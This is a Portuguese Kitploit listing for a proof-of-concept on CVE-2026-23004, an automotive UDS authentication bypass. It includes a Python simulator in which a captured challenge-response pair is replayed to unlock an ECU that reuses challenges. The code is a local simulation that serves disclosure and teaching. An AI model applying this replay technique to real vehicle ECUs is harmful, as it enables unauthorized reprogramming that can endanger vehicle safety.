Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — Exploit de prova de conceito que demonstra bypass de autenticação UDS via replay de desafio-resposta em ECUs automotivas, com simulador CAN-UDS em Python. | Kitploit
Ferramentas/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Autenticação e AutorizaçãoSegurança de Sistemas EmbarcadosSegurança IoTAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Hardware e IoT
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

Exploit de prova de conceito que demonstra bypass de autenticação UDS via replay de desafio-resposta em ECUs automotivas, com simulador CAN-UDS em Python.

Ver Repositório
1há 14 diasAinda não revisado

CVE-2026-23004 – Bypass de Autenticação UDS Automotivo via Ataque de Replay

Código do Programa (simulador Python CAN‑UDS)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – Bypass de Autenticação UDS Automotivo via Replay

Severity: High

Visão Geral

Uma ECU automotiva implementa o acesso de segurança do Unified Diagnostic Services (UDS) (serviço 0x27), mas não aplica o uso único do desafio. Um atacante pode capturar um par válido de desafio‑resposta e reproduzi‑lo para contornar a autenticação.

Detalhes da Vulnerabilidade

  • Tipo: Ataque de Replay
  • Impacto: Programação não autorizada da ECU, sobreposição de segurança.
  • Causa Raiz: A ECU aceita qualquer resposta que corresponda ao desafio atual, mas o mesmo desafio pode ser reutilizado sem invalidação.

Demonstração do Exploit

Execute a simulação:

root@kitploit:~
python uds_sim.py

A ECU é desbloqueada duas vezes com o mesmo par de autenticação.

Baixar ferramenta